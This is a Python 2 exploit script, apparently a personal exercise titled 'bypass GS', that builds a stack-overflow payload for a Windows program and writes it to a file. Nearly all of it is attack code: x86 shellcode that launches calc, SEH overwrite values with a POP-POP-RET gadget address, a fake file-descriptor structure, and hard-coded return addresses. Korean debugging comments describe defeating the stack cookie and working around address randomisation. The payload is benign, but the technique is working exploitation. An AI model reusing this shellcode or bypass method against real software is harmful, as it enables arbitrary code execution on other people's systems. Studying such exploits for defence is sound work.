#-*-encoding:utf-8-*-
#!python
# Title : bypass GS
# Author : c0nstant

#calc
import struct
calc =""
calc +="\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
calc +="\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
calc +="\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
calc +="\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
calc +="\x57\x78\x01\xc2\x8b\x7a\x20\x01"
calc +="\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
calc +="\x45\x81\x3e\x43\x72\x65\x61\x75"
calc +="\xf2\x81\x7e\x08\x6f\x63\x65\x73"
calc +="\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
calc +="\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
calc +="\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
calc +="\xb1\xff\x53\xe2\xfd\x68\x63\x61"
calc +="\x6c\x63\x89\xe2\x52\x52\x53\x53"
calc +="\x53\x53\x53\x53\x52\x53\xff\xd7"


#seh
# seh handler
'''
00401258   59               POP ECX
00401259   59               POP ECX
0040125A   C3               RETN

'''
seh_next = struct.pack('<L',0x909010EB)
seh_handler = struct.pack('<L',0x401258) 
pattern = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9"
# seh_next 이전에는 160바이트를 덮어야 한다..
# "\x90"*(164-4-len(calc)) : 160 - 112 = 48!
# 112

# fclose 덮는 부분 100 바이트
# Log data, item 9
 #Address=0BADF00D
 #Message= - Pattern d3Ad (0x64413364) found in cyclic pattern at position 100
# 그렇다면, 100~104를 \x00으로 두고 다른걸 패턴으로 덮어보자  
# 굿 이렇게 하니까 fclose의 인자 값을 건들 지 않는다. 
# 하지만 반환 값은 1이다 왜냐하면 \x00를 파일 디스크립터가 인지 못한다.
# 00401053   . 52             PUSH EDX                                 ; /stream = 02644100
#00401054   . FF15 B0204000  CALL DWORD PTR DS:[<&api-ms-win-crt-stdi>; \fclose
# 그렇다면 ASLR을 내가 적용하지 않았으니까 FCLOSE의 디스크립터가 고정적인지 그렇지 않은지 판단해보자..
# 두번째 시도
# 00401053   . 52             PUSH EDX                                 ; /stream = 02604100
# 00401054   . FF15 B0204000  CALL DWORD PTR DS:[<&api-ms-win-crt-stdi>; \fclose
# 지금 보면 aslr 우회하는 방법 중 하나와 비슷한 주소값이 떨어졌다.
# 하지만 ASLR 우회하는건 하위 바이트 2바이트만 변하는거라 쉬웠는데 지금은 중간 바이트가 변한다..... ㅠㅠ 
#----------------------------------------------------------------------------------------

# fake fd
fake = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x20\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
#payload = "A"*100
print 'fake len',len(fake) # 40
# fake fd stack address --> #0019FFD4 -> 0019FED0 임..#   

payload = fake+ "A"*(100-len(fake))+ struct.pack('<L',0x0019FED0) + "A"*4 + struct.pack('<L',0x0019FF40) + "\x90"*20 + calc 
#payload = pattern

print '[+] Creating...'

#print 'test ', len("\x90"*(164-4-112)+ "\x90"*48 + seh_next + seh_handler)
print 'shellcode len : ',len(calc)
#print 'payload ' ,len(calc) + len("\x90"*(164-4-112)+ "\x90"*48 + seh_next + seh_handler)
print 'payload',len(payload)
f = open("bypass2.txt","wb")
f.write(payload[:302])
f.close()